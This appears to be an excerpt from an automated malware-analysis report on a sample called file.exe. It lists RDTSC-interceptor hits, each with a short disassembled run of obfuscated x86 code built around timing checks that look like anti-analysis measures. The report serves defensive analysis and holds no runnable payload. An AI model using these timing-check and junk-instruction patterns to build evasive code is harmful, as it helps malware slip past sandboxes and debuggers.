Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 308146 second address: 30814A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30842F second address: 30844F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30844F second address: 308457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 308457 second address: 30845D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3085BA second address: 3085DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F4E04C4CBF8h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F4E04C4CC02h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3085DB second address: 3085FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB28h 0x00000007 push edx 0x00000008 jns 00007F4E04B2CB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3089F1 second address: 308A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 308A03 second address: 308A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B4CF3 second address: 2B4CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B4CF7 second address: 2B4D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4E04B2CB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4E04B2CB1Eh 0x00000013 jns 00007F4E04B2CB16h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 308F75 second address: 308F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 308F7B second address: 308F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30C7A0 second address: 30C7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30C7A6 second address: 30C7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 310FE1 second address: 310FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 310FE5 second address: 310FEF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4E04B2CB16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 310FEF second address: 311008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4E04C4CBFCh 0x0000000c jns 00007F4E04C4CBF6h 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316870 second address: 316874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3158A8 second address: 3158AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3158AD second address: 3158E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04B2CB25h 0x00000009 jmp 00007F4E04B2CB28h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 315D3B second address: 315D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04C4CC09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31531B second address: 315337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4E04B2CB27h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31AFC5 second address: 31AFE6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4E04C4CBF6h 0x00000008 jmp 00007F4E04C4CC03h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31AFE6 second address: 31AFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31AFEA second address: 31AFF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D6B9D second address: 2D6BE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F4E04B2CB21h 0x00000012 lea eax, dword ptr [ebp+1248B8C2h] 0x00000018 push edi 0x00000019 jmp 00007F4E04B2CB23h 0x0000001e pop edi 0x0000001f push eax 0x00000020 pushad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D6BE7 second address: 2B41D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4E04C4CC06h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F4E04C4CBF8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 call dword ptr [ebp+1245AB88h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D7043 second address: 11EBBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F4E04B2CB16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f adc ecx, 6C09CE12h 0x00000015 push dword ptr [ebp+122D06E9h] 0x0000001b sbb edi, 54B7B29Fh 0x00000021 call dword ptr [ebp+122D1DD5h] 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D1DBCh], edi 0x0000002e xor eax, eax 0x00000030 cld 0x00000031 jnp 00007F4E04B2CB1Ch 0x00000037 sub dword ptr [ebp+122D35C3h], ebx 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 clc 0x00000042 mov dword ptr [ebp+122D2D54h], eax 0x00000048 add dword ptr [ebp+122D1DBCh], esi 0x0000004e mov esi, 0000003Ch 0x00000053 jmp 00007F4E04B2CB1Bh 0x00000058 jmp 00007F4E04B2CB1Ch 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D1DBCh], ecx 0x00000067 lodsw 0x00000069 mov dword ptr [ebp+122D1DBCh], esi 0x0000006f jng 00007F4E04B2CB1Ch 0x00000075 mov dword ptr [ebp+122D29D9h], edx 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f jmp 00007F4E04B2CB29h 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 sub dword ptr [ebp+122D1DBCh], edi 0x0000008e push eax 0x0000008f push eax 0x00000090 push eax 0x00000091 push edx 0x00000092 jo 00007F4E04B2CB16h 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D710B second address: 2D710F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D7200 second address: 2D7204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D7204 second address: 2D7245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F4E04C4CBFAh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F4E04C4CC03h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push ebx 0x00000023 push eax 0x00000024 pop eax 0x00000025 pop ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jns 00007F4E04C4CBF6h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D73BE second address: 2D73C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D7C5B second address: 2D7C61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D7FB7 second address: 2B4CF3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F4E04B2CB16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call dword ptr [ebp+122D3A98h] 0x00000013 pushad 0x00000014 jg 00007F4E04B2CB18h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31A3ED second address: 31A413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a jng 00007F4E04C4CC2Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F4E04C4CC02h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31A413 second address: 31A423 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4E04B2CB16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31A423 second address: 31A427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31A6D8 second address: 31A71D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F4E04B2CB2Dh 0x0000000f jmp 00007F4E04B2CB27h 0x00000014 popad 0x00000015 jng 00007F4E04B2CB42h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31A71D second address: 31A73F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4E04C4CC06h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31A8CC second address: 31A8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31D3D1 second address: 31D3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 28C929 second address: 28C93E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 28C93E second address: 28C942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31D111 second address: 31D11D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4E04B2CB16h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31D11D second address: 31D121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31D121 second address: 31D131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4E04B2CB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31FE04 second address: 31FE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31FF7A second address: 31FFB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007F4E04B2CB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F4E04B2CB25h 0x00000012 pop edi 0x00000013 pushad 0x00000014 jmp 00007F4E04B2CB24h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 320143 second address: 320167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4E04C4CC04h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 320167 second address: 32016B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3245EB second address: 32463A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC05h 0x00000007 jne 00007F4E04C4CBF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F4E04C4CC02h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4E04C4CC02h 0x0000001f jng 00007F4E04C4CBF6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3248F4 second address: 3248F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3248F8 second address: 32491F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC01h 0x00000007 jmp 00007F4E04C4CBFDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 329955 second address: 32995B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 329C10 second address: 329C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D7850 second address: 2D78EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F4E04B2CB1Bh 0x00000010 nop 0x00000011 sub ecx, dword ptr [ebp+122D2FE5h] 0x00000017 mov ebx, dword ptr [ebp+1248B901h] 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F4E04B2CB18h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 ja 00007F4E04B2CB1Bh 0x0000003d add eax, ebx 0x0000003f mov edi, dword ptr [ebp+122D2CDCh] 0x00000045 jmp 00007F4E04B2CB29h 0x0000004a nop 0x0000004b push eax 0x0000004c jnc 00007F4E04B2CB28h 0x00000052 pop eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 je 00007F4E04B2CB18h 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 329EB2 second address: 329EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32A90E second address: 32A915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32A915 second address: 32A92B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4E04C4CC01h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32A92B second address: 32A934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32A934 second address: 32A93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4E04C4CBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32A93E second address: 32A952 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4E04B2CB1Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32A952 second address: 32A957 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32D547 second address: 32D54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32D54B second address: 32D54F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32D6B3 second address: 32D6B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32D6B7 second address: 32D6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32D6C1 second address: 32D6D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4E04B2CB1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32D6D5 second address: 32D6EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E04C4CC06h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32D6EF second address: 32D6F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32D9F7 second address: 32D9FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32D9FC second address: 32DA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04B2CB25h 0x00000009 jng 00007F4E04B2CB16h 0x0000000f jne 00007F4E04B2CB16h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d jmp 00007F4E04B2CB24h 0x00000022 je 00007F4E04B2CB16h 0x00000028 popad 0x00000029 pushad 0x0000002a jmp 00007F4E04B2CB1Bh 0x0000002f jmp 00007F4E04B2CB1Ch 0x00000034 pushad 0x00000035 popad 0x00000036 jnp 00007F4E04B2CB16h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32DA65 second address: 32DA83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC02h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F4E04C4CBF6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 336224 second address: 336245 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4E04B2CB28h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 336245 second address: 33626D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04C4CC03h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push ebx 0x0000000e jmp 00007F4E04C4CBFAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 334343 second address: 33436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4E04B2CB16h 0x0000000a popad 0x0000000b push edi 0x0000000c jg 00007F4E04B2CB16h 0x00000012 jmp 00007F4E04B2CB24h 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3344D5 second address: 3344DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3344DB second address: 3344F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04B2CB23h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3344F8 second address: 3344FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3344FE second address: 334504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3347BB second address: 3347C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3350CD second address: 3350D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3359D1 second address: 3359F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 jng 00007F4E04C4CC12h 0x0000000f jmp 00007F4E04C4CC06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 339EAC second address: 339EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 339EB0 second address: 339EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4E04C4CBF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4E04C4CC08h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 339EDD second address: 339EFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F4E04B2CB29h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
